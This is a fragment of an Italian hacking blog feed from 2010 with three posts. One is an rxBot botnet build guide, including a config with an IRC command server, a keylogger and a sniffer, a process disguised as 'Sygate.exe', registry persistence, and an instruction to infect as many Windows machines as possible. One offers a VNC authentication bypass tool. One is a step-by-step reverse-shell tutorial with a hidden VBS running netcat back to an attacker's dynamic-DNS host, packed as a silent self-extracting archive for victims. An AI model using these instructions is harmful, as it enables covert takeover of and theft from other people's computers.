<p>Service pack 6.0 ( http://www.microsoft.com/downloads/details.aspx?familyid=A8494EDB-2E89-4676-A16A-5C5477CB9713&amp;displaylang=it )</p>
<p>/ATTENZIONE/:</p>
<p>Ci sono rxbot nn cripatati e quindi ke devono essere compilati normalmente a caratteri normali<br />
invece ci sono alcuni che vengono compialti criptati&#8230; ma questo credo che ne riparleremo<br />
nella prossima Guida&#8230;.</p>
<p>Allora per prima cosa dopo aver installato tutto! Mettete tutti i src dell&#8217;rx bot in una cartella<br />
che poi tratteremo&#8230;<br />
Aprite il Visual e andate nel pannello delle impostazioni ovvero &#8221; OPTIONS &#8220;<br />
Dirigiamoci su &#8220;DIRECTORIES &#8221; e selezioniamo EXECUTABLE FILES dove andremo ad inserire la<br />
prima libreria dell SDK ovvero la BIN!<br />
Cliccate 2 volte in basso alla finestrella dove appaiono le due &#8220;..&#8221; e diciamogli di<br />
indirizzarci sulla PATH O meglio DIRECTORY dove e&#8217; situato la libreria dell SDK ovvero<br />
C:PROGRAM FILESMICROSOFT SDKBIN<br />
fatto cio&#8230; facciamo lo stesso con le seguenti voci&#8230;<br />
-Executable files ( C:PROGRAM FILESMICROSOFT SDKBIN )<br />
-Include files ( C:PROGRAM FILESMICROSOFT SDKINCLUDE )<br />
-Library files ( C:PROGRAM FILESMICROSOFT SDKLIB )</p>
<p>Una volta fatto andiamo nella cartella dove abbiamo il sorgente dell rx e apriamo il file .dsw<br />
e ora dobbiamo cercare il file config.h dove setteremo tutte le nostre impostazioni su dove<br />
mettersi in ascolto il nostro trojan , su quale canale joinare e tutte le altre cose&#8230;<br />
Quindi&#8230; si passa al prossimo capitolo!<br />
ANALISI Config.h</p>
<p>{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}</p>
<p>PRENDO IN ESEMPIO UN RX MOLTO VALIDO E BUONO LA CARA E VEKKIA MOD DI &#8220;DoS Resilient RPMiSO&#8221;<br />
OK il config si presenta cosi</p>
<p>// Good shit Mod By DoS Resilient RPMiSO !<br />
// bot configuration (generic) &#8211; doesn&#8217;t need to be encrypted<br />
int port = 6667;                                // &#8220;Questa e&#8217; la porta del server IRC&#8221;<br />
int port2 = 7000;                                // &#8221; In caso la porta fosse chiusa usa un&#8217;altra&#8221;<br />
int socks4port = 1980;                        // Port # Questo da utilizzare se usiamo Sock<br />
int tftpport = 69;                                // Port # questa e&#8217; la porta del demone ftp<br />
int httpport = 84;                        // Port # questa e&#8217; la porta del demone http<br />
int rloginport = 5004;                        // Port # questa e&#8217; la porta del demone rlogin<br />
BOOL topiccmd = TRUE;                        // Qua settiamo se il bot deve autosettare il topic<br />
BOOL rndfilename = FALSE;                // Comando per mettere un nick random al bot<br />
BOOL AutoStart = TRUE;                        // Abilita l&#8217;autostart del registro<br />
char prefix = &#8216;-&#8217;;                                // il comando che verra&#8217; dato al bot sara&#8217; -comando<br />
int maxrand = 6;                                // Numeri random ke verranno dati al bot preceduto dal nick<br />
int nicktype = COUNTRYNICK;                // nick type<br />
BOOL nickprefix = TRUE;                        // nick uptime &amp; mirc prefix</p>
<p>#ifdef DEBUG_LOGGING<br />
char logfile[]=&#8221;c:\r0fl.txt&#8221;;<br />
#endif</p>
<p>#ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!</p>
<p>#else  // Recommended to use this only for Crypt() setup, this is unsecure.</p>
<p>char botid[] = &#8220;BoT&#8221;;                                                // Qua verra&#8217; messo l&#8217;id del bot<br />
char version[] = &#8220;[rxBot ItalianMod by DoS|ResilienT|RPMISO";                // Il nome della Mod =) non modificare =)<br />
char password[] = &#8220;Tuapass&#8221;;                                        // la password ke verra&#8217; loggata dal bot<br />
char server[] = &#8220;irc.flashirc.org&#8221;;                // qua mettiamo il nostro server irc dove joinera&#8217; il bot<br />
char serverpass[] = &#8220;&#8221;;                                                // se il server ha una password settiamola<br />
char channel[] = &#8220;#Tuocanale&#8221;;                                // Qua inseriamo il canale dove joinera&#8217; il bot<br />
char chanpass[] = &#8220;tuakey&#8221;;                                        // qui metteremo la password o meglio +K se il chan a password<br />
char server2[] = &#8220;irc2.flashirc.org&#8221;;                                // in caso di down server settiamo un altro irc server (optional)<br />
char channel2[] = &#8220;#tuocanale&#8221;;                                                // in caso il chan fosse non disponibile (optional)<br />
char chanpass2[] = &#8220;tuakey&#8221;;                                                // password dell&#8217;altro chan =) settato da noi (optional)<br />
char filename[] = &#8220;Sygate.exe&#8221;;                        // nome che daremo al processo che si vedra&#8217; nella TASK MANAGER<br />
char keylogfile[] = &#8220;Allarm.txt&#8221;;                                // fILE name del Keylogger<br />
char valuename[] = &#8220;Sygate Personal Firewall&#8221;;                // value name per l&#8217;autostart ( dal registro di sistema )<br />
char nickconst[] = &#8220;&#8221;;                                        // first part to the bot&#8217;s nick<br />
char szLocalPayloadFile[]=&#8221;msconfig.dat&#8221;;        // Payload filename<br />
char modeonconn[] = &#8220;+n+B&#8221;;                                        // Can be more than one mode and contain both + and -<br />
char exploitchan[] = &#8220;#tuocanale&#8221;;                                        // mettiamo il nostro chan per visualizzar l&#8217;exploitazione<br />
char keylogchan[] = &#8220;#tuocanale&#8221;;                                                // mettiamo il nostro chan per visualizzar il keyloger<br />
char psniffchan[] = &#8220;#tuocanale&#8221;;                                                // mettiamo il nostro chan per visualizzar lo sniffing =)</p>
<p>char *authost[] = {<br />
&#8220;*@*&#8221;, &lt;&#8212;&#8211; SETTIAMO QUI *@* cosi qualunque HOST potra loggarsi in caso avete un bnc mettete *HOSTBNC* =)<br />
};</p>
<p>char *versionlist[] = {<br />
&#8220;&#8221;<br />
};</p>
<p>char regkey1[]=&#8221;Software\Microsoft\Windows\CurrentVersion\Run&#8221;; &#8212;&gt; path dove si andra&#8217; ad inserire il bot<br />
char regkey2[]=&#8221;Software\Microsoft\Windows\CurrentVersion\RunServices&#8221;; &#8211;&gt; path dove si andra&#8217; ad inserire il bot<br />
char regkey3[]=&#8221;Software\Microsoft\OLE&#8221;; &#8211;&gt; path dove si andra&#8217; ad inserire il bot<br />
char regkey4[]=&#8221;SYSTEM\CurrentControlSet\Control\Lsa&#8221;; &#8211;&gt; path dove si andra&#8217; ad inserire il bot</p>
<p>#endif</p>
<p>#ifdef PLAIN_CRYPT<br />
char key[16] = &#8220;i0r0xx0&#8243;; // CHANGE THIS!!! hmmm..Do I even need this now?<br />
#endif</p>
<p>BENE UNA VOLTA COMPILATO COME SEGUE QUESTO FILE CLICCATE IN ALTO SU BUILD E SUBITO DOPO rbot.exe E VI CREERA&#8217; UN<br />
FILE rb0t.exe NELLA CARTELLA SPECIALE DELL&#8217;RX&#8230; DOPODICHE LA PACKERETE CON UN QUALSIASI PACKER &#8221; DECENTE &#8220;<br />
E SARETE PRONTI AD INFETTARE TUTTE LE MACCHINE POSSIBILE INIMAGINABILI PER WINDOWS&#8230;.</p>
<p>TUTTO IL MATERIALE LO TROVATE &#8212;&#8212;&#8211;&gt;<a href="http://www.mediafire.com/?y4n04r4yl2m" target="_blank">QUA&#8217;</a></p>
<p>ECCO IL VIDEO&#8230;</p>
<span style="text-align:center; display: block;"><a href="http://ago1980.wordpress.com/2010/05/13/rxbot-botnet/"><img src="http://img.youtube.com/vi/bZNnpJOYJGg/2.jpg" alt="" /></a></span>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ago1980.wordpress.com/725/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ago1980.wordpress.com/725/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ago1980.wordpress.com/725/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ago1980.wordpress.com/725/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ago1980.wordpress.com/725/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ago1980.wordpress.com/725/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ago1980.wordpress.com/725/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ago1980.wordpress.com/725/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ago1980.wordpress.com/725/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ago1980.wordpress.com/725/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ago1980.wordpress.com/725/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ago1980.wordpress.com/725/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ago1980.wordpress.com/725/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ago1980.wordpress.com/725/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=725&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ago1980.wordpress.com/2010/05/13/rxbot-botnet/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/916910d22d67e1d6d8fe1099d7e45a2f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ago1980</media:title>
		</media:content>
	</item>
		<item>
		<title>Bypassare Versioni di VNC. 4.1.x</title>
		<link>http://ago1980.wordpress.com/2010/04/21/bypassare-versioni-di-vnc-4-1-x/</link>
		<comments>http://ago1980.wordpress.com/2010/04/21/bypassare-versioni-di-vnc-4-1-x/#comments</comments>
		<pubDate>Wed, 21 Apr 2010 21:44:47 +0000</pubDate>
		<dc:creator>ago1980</dc:creator>
				<category><![CDATA[Bypassare Vnc]]></category>

		<guid isPermaLink="false">http://ago1980.wordpress.com/?p=695</guid>
		<description><![CDATA[Ecco come bypassare vnc.4.1.x DOWNLOAD bypauth : linux DOWNLOAD bypauth : windows<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=695&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Ecco come bypassare vnc.4.1.x</p>
<span style="text-align:center; display: block;"><a href="http://ago1980.wordpress.com/2010/04/21/bypassare-versioni-di-vnc-4-1-x/"><img src="http://img.youtube.com/vi/It9hz68rO5w/2.jpg" alt="" /></a></span>
<p><a href="http://rapidshare.com/files/378588981/VNC_bypauth-linux.tar.gz.html" target="_blank">DOWNLOAD bypauth</a> : linux</p>
<p><a href="http://ul.to/miidsn" target="_blank">DOWNLOAD bypauth </a>: windows</p>
<p><a href="http://rapidshare.com/files/125752500/vnc.rar.html" target="_blank"><br />
</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ago1980.wordpress.com/695/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ago1980.wordpress.com/695/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ago1980.wordpress.com/695/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ago1980.wordpress.com/695/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ago1980.wordpress.com/695/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ago1980.wordpress.com/695/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ago1980.wordpress.com/695/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ago1980.wordpress.com/695/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ago1980.wordpress.com/695/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ago1980.wordpress.com/695/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ago1980.wordpress.com/695/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ago1980.wordpress.com/695/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ago1980.wordpress.com/695/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ago1980.wordpress.com/695/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=695&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ago1980.wordpress.com/2010/04/21/bypassare-versioni-di-vnc-4-1-x/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/916910d22d67e1d6d8fe1099d7e45a2f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ago1980</media:title>
		</media:content>
	</item>
		<item>
		<title>Revers Shell</title>
		<link>http://ago1980.wordpress.com/2010/03/23/revers-shell/</link>
		<comments>http://ago1980.wordpress.com/2010/03/23/revers-shell/#comments</comments>
		<pubDate>Tue, 23 Mar 2010 21:47:12 +0000</pubDate>
		<dc:creator>ago1980</dc:creator>
				<category><![CDATA[Revers Shell]]></category>

		<guid isPermaLink="false">http://ago1980.wordpress.com/?p=690</guid>
		<description><![CDATA[revers shell Una reverse shell è un tipo di attacco che permette di ottenere il prompt dei comandi di un sistema remoto con diritti amministrativi. A differenza di una &#8220;direct shell&#8221;, non è chi attacca che si collega al pc-vittima. Sarà bensì il pc-vittima che si collegherà al pc di chi attacca, fornendogli il prompt [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=690&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<h3><a href="http://danniseri.blogspot.com/2009_12_01_archive.html#6625007939658403480">revers shell</a></h3>
<p>Una reverse shell è un tipo di attacco che permette di ottenere il prompt dei comandi di un sistema remoto con diritti amministrativi.</p>
<p>A differenza di una &#8220;direct shell&#8221;, non è chi attacca che si collega al pc-vittima. Sarà bensì il pc-vittima che si collegherà al pc di chi attacca, fornendogli il prompt dei comandi.</p>
<p>Questo consente di ovviare ai già discussi problemi di &#8220;pass-through&#8221;, ossia riuscire a sorpassare firewall, router e quant&#8217;altro blocchi le connessioni in ingresso verso il pc-vittima.</p>
<p>Il tutorial che segue cercherà di spiegare come impostare una reverse shell per ottenere il controllo del prompt dei comandi di sistemi remoti basati su Windows.</p>
<p><strong>Strumenti necessari</strong>:</p>
<p>NetCat (nc.exe, network utility che permette di agganciare programmi in riga di comando e redirezionare l&#8217;input e l&#8217;output da e verso un sistema remoto)<br />
WinRar (software utility di compressione / decompressione archivi; utilissimo per creare i famigerati archivi autoestraenti)<br />
Editor del Registro di sistema (reg.exe, software utility di editazione del registro di windows da riga di comando)<br />
WebGet (wget.exe, network utility che permette di scaricare qualsiasi file via HTTP o FTP direttamente da riga di comando)</p>
<p><strong>Prerogative</strong>:</p>
<p>Iscrizione ad un servizio di DNS dinamici (tipo DynDNS, No-IP, etc.)<br />
Installazione di un client Updater di DNS dinamici sul proprio PC<br />
Apertura di una porta TCP (liberamente scelta) sul firewall del proprio PC<br />
Eventualmente (se ci si collega ad internet con un router), forward della porta TCP che è stata scelta, dal router al proprio PC Client.</p>
<p><strong>- PARTE 1 &#8211; Preparazione del proprio PC</strong></p>
<p>Si inizia con l&#8217;iscrizione al servizio di DNS dinamici. I DNS dinamici sono necessari per poter &#8220;ritrovare&#8221; il nostro pc in internet senza dover ogni volta andare a controllare il nostro IP pubblico (che cambia, di tanto in tanto, essendo un IP dinamico).</p>
<p>In questo esempio si userà il servizio fonito da DynDNS.org [http://www.dyndns.org].<br />
<strong>CREAZIONE HOST DYNDNS</strong></p>
<p>Recarsi sul sito <a href="http://www.dyndns.org/" target="_blank">http://www.dyndns.org</a> ed effettuare un&#8217;iscrizione.<br />
Una volta iscritti e verificati, recarsi nella sezione &#8220;My services&#8221; e cliccare il link &#8220;add hostname&#8221; in prossimità della sezione &#8220;Host Services&#8221;.<br />
Qui avrete la possibilità di scegliervi una specie di dominio di terzo livello. Dovrete scegliere, dal menu a tendina sulla destra, un &#8220;suffisso&#8221; (ce ne sono diversi, dyndns.org, blogsite.org, kick-ass.org, etc.). Scegliete quello che più vi aggrada. In quest&#8217;esempio ho scelto &#8220;kick-ass.org&#8221;.<br />
A questo punto, è necessario scegliere un &#8220;prefisso&#8221;, che starà prima di kick-ass.org. In questo esempio io ho scritto &#8220;shell&#8221;, in modo da formare il dominio di terzo livello <strong>shell.kick-ass.org</strong>.<br />
Poi, cliccate sul link &#8220;Use auto detected IP address xxx.xxx.xxx.xxx&#8221; che c&#8217;è sotto. Questo farà in modo che il dominio che si sta per creare punterà subito all&#8217;IP della vostra connessione ad internet.<br />
Ora potete cliccare il bottone &#8220;Create Host&#8221;, per confermare la creazione del vostro DNS dinamico.</p>
<p>(naturalmente, il servizio suddetto è del tutto gratutito. DynDNS offre anche servizi &#8220;premium&#8221; a pagamento, ma per quello di cui abbiamo bisogno ci và più che bene il servizio base gratuito).</p>
<p><strong>INSTALLAZIONE DYNDNS UPDATER SUL PROPRIO PC</strong></p>
<p>Ora che abbiamo registrato correttamente il nostro host e l&#8217;abbiamo sincronizzato al nostro attuale indirizzo IP, abbiamo bisogno di installare un software &#8220;updater&#8221; che faccia in modo che ogni volta che il nostro IP cambia l&#8217;host shell.kick-ass.org venga risincronizzato con il nuovo IP.</p>
<p>DynDNS offre un client gratuito. Recatevi su <a href="https://www.dyndns.com/support/clients/" target="_blank">https://www.dyndns.com/support/clients/</a> e cliccate il link &#8220;Download Now&#8221; che è presente sulla destra. In questo modo scaricherete il software DynUpSetup.exe.</p>
<p>Eseguite il setup e premete &#8220;next&#8221; fino ad arrivare alla schermata &#8220;Install as a service&#8221;. Qui raccomando di mettere il segno di spunta sulla casella &#8220;Install the DynDNS Updater as a Windows Service&#8221;. In questo modo, l&#8217;updater sarà installato come un servizio di windows, e si avvierà automaticamente fornendovi una sincronizzazione dell&#8217;IP completamente automatica.<br />
Al termine dell&#8217;installazione, si aprirà una schermata che vi chiede le informazioni del vostro account DynDNS (nome utente e password). Inserite i dati e vedrete che il programma aggiungerà il nome host shell.kick-ass.org all&#8217;interno della finestra. Cliccate il quadratino in prossimità del nome host per impostare la sincronizzazione. Ora cliccate il bottone &#8220;OK&#8221; e il gioco è fatto.</p>
<p><strong>SCELTA DELLA PORTA TCP DA USARE PER LE CONNESSIONI E RELATIVA APERTURA SUL FIREWALL DI WINDOWS</strong></p>
<p>A questo punto è necessario decidere quale porta TCP usare per accettare le connessioni in ingresso delle future vittime.</p>
<p>Qualsiasi porta puo&#8217; andar bene.. Ovviamente, conviene scegliere una porta &#8220;poco sospetta&#8221;, dove nessun eventuale curiosone andrebeb a cercare eventuali servizi in ascolto.<br />
A tal proposito, direi che una qualsiasi porta TCP dalla 40000 alla 50000 può andar bene.<br />
Nel nostro esempio useremo la porta TCP 43712 (e sfido qualsiasi curiosone ad immaginare che su quella porta ci giri un servizio!).</p>
<p>Recatevi sul pannello di controllo del vostro PC, cliccate l&#8217;icona &#8220;Widnows Firewall&#8221;, recatevi sulla scheda &#8220;eccezioni&#8221; (se usate Vista, prima dovete cliccare sul link &#8220;Modifica impostazioni&#8221;) e cliccate il bottone &#8220;Aggiungi porta&#8221;.<br />
A questo punto inseriremo: come nome porta &#8220;revshell&#8221; (ovviamente è solo un esempio), come numero porta 43712, come protocollo TCP.<br />
Ora potete premere &#8220;OK&#8221; e di nuovo &#8220;OK&#8221;. Il firewall di windows è stato correttamente impostato per lasciar passare le connessioni in ingresso sulla porta TCP 43712.</p>
<p>Se vi connettete ad internet tramite modem USB o modem Ethernet (in questo caso, di solito ci si connette con username e password direttamente da windows) siete pronti così e non avete bisogno di ulteriori passaggi per configurare le connessioni in ingresso.</p>
<p><strong>PER CHI USA UN ROUTER PER CONNETTERSI AD INTERNET, PORT-FORWARD</strong></p>
<p>Chi usa un router (che sia cablato o wireless, non fà differenza) ha bisogno di un ulteriore passaggio per accettare connesisoni in ingresso.<br />
Sarà necessario impostare un port-forwarding dalla porta TCP 43712 del router alla porta TCP 43712 del proprio PC client.<br />
Per capirci, se usate emule con un router non configurato, incapperete nel famoso problema dell&#8217;ID basso (l&#8217;iconcina del mulo ha una benda nera sugli occhi). E&#8217; esattamente la stessa situazione in cui ci troviamo noi con questa guida.<br />
Siccome l&#8217;apertura delle porte sui router non è una procedura standard (cambia a seconda del modello di router) vi rimando alla pagina di help di emule-italia, dov&#8217;è presente una guida per il port forwarding e vari esempi per vari modelli di router: <a href="http://www.emule.it/guida_emule/config_porte/routers.asp" target="_blank">http://www.emule.it/guida_emule/config_porte/routers.asp</a></p>
<p>Seguite la guida ricordandovi di effettuare la configurazione per la porta TCP 43712 (la parte relativa alla porta UDP la potete tranquillamente saltare).</p>
<p><strong>- PARTE 2 &#8211; Preparazione del &#8220;pacchetto sorpresa&#8221; da inviare alla vittima</strong></p>
<p>In questa fase vedremo come preparare l&#8217;archivio autoestraente da inviare alla vittima; inseriremo nel pacchetto tutti i programmi fondamentali per prendere il controllo del PC e &#8220;agganciarsi&#8221; ad esso con unghie e denti.</p>
<p><strong>DOWNLOAD DEGLI STRUMENTI</strong></p>
<p><strong>NetCat</strong> &#8211; <strong><a href="http://joncraton.org/files/nc111nt.zip" target="_blank">http://joncraton.org/files/nc111nt.zip</a></strong><br />
[ Non esiste nessuna homepage dove scaricare il NetCat per Windows, il link l'ho trovato direttamente su wikipedia, qui: <a href="http://en.wikipedia.org/wiki/Netcat" target="_blank">http://en.wikipedia.org/wiki/Netcat</a><br />
Inoltre, NetCat è un hacking tool; ciò significa che di per sé è innocuo, ma se usato da un hacker per scopi maliziosi, diventa un potente strumento di controllo remoto; pertanto, alcuni antivirus (tra i quali Kaspersky e Norton) lo rilevano come "potenzialmente pericoloso" ]</p>
<p><strong>WinRar</strong> &#8211; <strong><a href="http://www.rarlab.com/rar/wrar380b4it.exe" target="_blank">http://www.rarlab.com/rar/wrar380b4it.exe</a></strong><br />
[ Famosissimo programma di gestione archivi. Il link in alto è per la versione 3.80 beta 4 in Italiano. Se si desidera installare una versione diversa, rimando alla homepage <a href="http://www.rarlab.com/" target="_blank">http://www.rarlab.com</a> ]</p>
<p><strong>Reg.exe [editor del registro]</strong> &#8211; <strong><a href="http://www.dynawell.com/download/reskit/microsoft/win2000/reg.zip" target="_blank">http://www.dynawell.com/download/reskit/mi&#8230;win2000/reg.zip</a></strong><br />
[ Editor del registro di sistema di Windows da riga di comando. La versione linkata è quella contenuta nel Resource Kit per Windows 2000. In windows XP (credo anche in Vista) il comando reg.exe dovrebbe essere presente di default nel sistema operativo. Io lo includo nel pacchetto per ovviare a qualsiasi evenienza ]</p>
<p><strong>WebGet</strong> &#8211; <strong><a href="http://users.ugent.be/%7Ebpuype/cgi-bin/fetch.pl?dl=wget/wget.exe" target="_blank">http://users.ugent.be/~bpuype/cgi-bin/fetc&#8230;l=wget/wget.exe</a></strong><br />
[ Port per Win32 del programma fondamentale webget (di default si trova in qualsiasi distribuzione di Linux / Unix). Il programma permette di effettuare download di files via HTTP o FTP direttamente da riga di comando ]</p>
<p>Create una cartella da qualche parte (sul Desktop?) chiamata &#8220;revshell&#8221;; scaricate tutti gli strumenti sopraelencati, e copiate gli eseguibili &#8220;nc.exe&#8221;, &#8220;reg.exe&#8221; e &#8220;wget.exe&#8221; all&#8217;interno della cartella revshell. Installate WinRar.</p>
<p>Il contenuto della cartella dovrà essere il seguente:</p>
<p>- revshell:<br />
&#8211;&gt; nc.exe<br />
&#8211;&gt; reg.exe<br />
&#8211;&gt; wget.exe</p>
<p>Adesso, sarà necessario creare uno script batch (io uso il VBScript per creare i batch, probabilmente si può fare anche con i semplici &#8220;.BAT&#8221;, ma da lì non so come eseguire programmi in modalità nascosta&#8230;).</p>
<p>Aprite il blocco note e incollate all&#8217;interno queste 2 righe di codice:</p>
<p><!--[if !supportLineBreakNewLine]--></p>
<p><strong>CODICE</strong></p>
<p>Set WshShell = WScript.CreateObject(&#8220;WScript.Shell&#8221;)<br />
WshShell.Run &#8220;nc.exe -e cmd.exe shell.kick-ass.org 43712&#8243;, 0</p>
<p>Cosa vuol dire quel codice?<br />
Lo script in VBS esegue il programma <strong>nc.exe</strong>, agganciandogli (<strong>-e</strong>) il prompt dei comandi (<strong>cmd.exe</strong>) e gli dice di connettersi verso l&#8217;host <strong>shell.kickass.org</strong> sulla porta <strong>43712</strong>. Lo zero alla fine serve a specificare che il prog deve essere eseguito senza mostrare la finestra (hehe).</p>
<p>Salvate il file come &#8220;revshell.vbs&#8221; (mi raccomando l&#8217;estensione &#8220;vbs&#8221;) e piazzatelo nella cartella &#8220;revshell&#8221; insieme agli altri 3 EXE.</p>
<p><strong>CREAZIONE DEL PACCHETTO AUTO-ESTRAENTE</strong><br />
♠<br />
Ora, selezionate tutti e quattro i files (3 .exe e 1 .vbs), cliccate col tasto destro sulla selezione e scegliete &#8220;Aggiungi ad un archivio&#8221; dal menu contestuale.</p>
<p>Si aprirà la finestra di creazione archivi di WinRar.</p>
<p>Mettete subito il segno di spunta su &#8220;Crea un archivio autoestraente&#8221;:</p>
<p>A questo punto passate alla scheda &#8220;Avanzati&#8221; e cliccate il bottone &#8220;Modulo auto-estraente&#8221;.<br />
Si aprirà un&#8217;ulteriore finestra.</p>
<p>Mettete,<br />
&#8220;percorso d&#8217;estrazione&#8221;: ../windows/system32/sys<br />
&#8220;esegui dopo l&#8217;estrazione&#8221;: revshell.vbs<br />
<!--[if gte vml 1]&gt;  &lt;![endif]--><!--[if !vml]--><!--[endif]--></p>
<p>Poi, passate alla scheda &#8220;Avanzate&#8221; e mettete il segno di spunta su &#8220;Richiedi l&#8217;accesso come amministratore&#8221;.<br />
<!--[if gte vml 1]&gt;  &lt;![endif]--><!--[if !vml]--><!--[endif]--></p>
<p>Poi, passate alla scheda &#8220;Modalità&#8221; e scegliete &#8220;Nascondi tutto&#8221; e &#8220;Sovrascrivi tutti i file già esistenti&#8221;.<br />
<!--[if gte vml 1]&gt;  &lt;![endif]--><!--[if !vml]--><!--[endif]--></p>
<p>Opzionalmente, potete recarvi sulla scheda &#8220;Testo iniziale ed icone&#8221; e scegliere un icona personalizzata cliccando il bottone &#8220;sfoglia&#8221; in prossimità di &#8220;carica l&#8217;icona dal file&#8221;.<br />
<!--[if gte vml 1]&gt;  &lt;![endif]--><!--[if !vml]--><!--[endif]--></p>
<p>Fatto questo, premete il bottone &#8220;OK&#8221;, di nuovo &#8220;OK&#8221; e verrà creato il file &#8220;revshell.exe&#8221; nella cartella revshell <!--[if gte vml 1]&gt;  &lt;![endif]--><!--[if !vml]--></p>
<p>Il pacchetto è pronto per essere inviato.</p>
<p><strong>- PARTE 3 &#8211; Mettere NetCat in ascolto sul PC locale</strong></p>
<p><strong>CREAZIONE DEL BATCH PER L&#8217;ESECUZIONE LOCALE DI NETCAT</strong></p>
<p>Per poter accettare la connessione reverse del pc vittima, sarà necessario mettere in ascolto NetCat sul nostro PC locale. Avendo già impostato i DNS dinamici, avendo già aperto le porte sul firewall (ed eventualmente avendo anche forwardato la porta sul router), il nostro PC è perfettamente equipaggiato per accettare le connessioni in ingresso sulla porta TCP 43712.</p>
<p>Recatevi nella cartella revshell e create un nuovo file di testo, chiamandolo &#8220;nc_locale.cmd&#8221; (mi raccomando l&#8217;estensione &#8220;.cmd&#8221;. In alternativa si può usare l&#8217;estensione &#8220;.bat&#8221;; non c&#8217;è differenza, l&#8217;importante è che non lasciate il &#8220;.txt&#8221;).</p>
<p>Aprite il file e scriveteci dentro:</p>
<p><strong>CODICE</strong></p>
<p>nc.exe -v -L -p 43712</p>
<p>Cosa significa quel codice? Quel codice lancia NetCat sul vostro PC con lo switch &#8220;verbose&#8221; (-v, significa che &#8220;chiacchiererà&#8221; parecchio), lo mette in modalità &#8220;ascolto&#8221; (-L, in inglese &#8220;Listening&#8221;) sulla porta 43712 (-p 43712).</p>
<p>Salvate il file.</p>
<p><strong><span style="text-decoration:underline;">- E ADESSO FACCIAMO PARTIRE IL TUTTO -</span></strong></p>
<p>Per prima cosa, cliccate il file &#8220;nc_locale.cmd&#8221; della cartella revshell del vostro computer. Si aprirà una shell con NetCat che attende una connessione in ingresso.</p>
<p>Adesso, inviate il pacchetto &#8220;revshell.exe&#8221; (magari cabiate il nome C_C ) alla vostra vittima e fate in modo che lo esegua.</p>
<p>Se tutto va bene (e per &#8220;va bene&#8221; intendo dire che la &#8220;vittima&#8221; non abbia in uso Norton Antivirus o Kaspersky, che ahimé, intercettano nc.exe come &#8220;hacking tool&#8221;) <strong>dovrebbe comparire il prompt dei comandi del pc vittima direttamente sul vostro schermo, esattamente dove avevamo lasciato NetCat in ascolto</strong>.</p>
<p>Ora che avete il prompt remoto, teoricamente potete fare qualsiasi cosa: con wget potete far scaricare alla vittima qualsiasi programma, ed eseguirlo da remoto. Con reg.exe potete editare il registro di sistema remoto per aggiungere, rimuovere chiavi di registro. Col comando &#8220;tasklist.exe&#8221; potete visualizzare la lista dei processi in esecuzione sul pc remoto, e col comando &#8220;taskkill.exe&#8221; li potete terminare&#8230; Eccetera, eccetera</p>
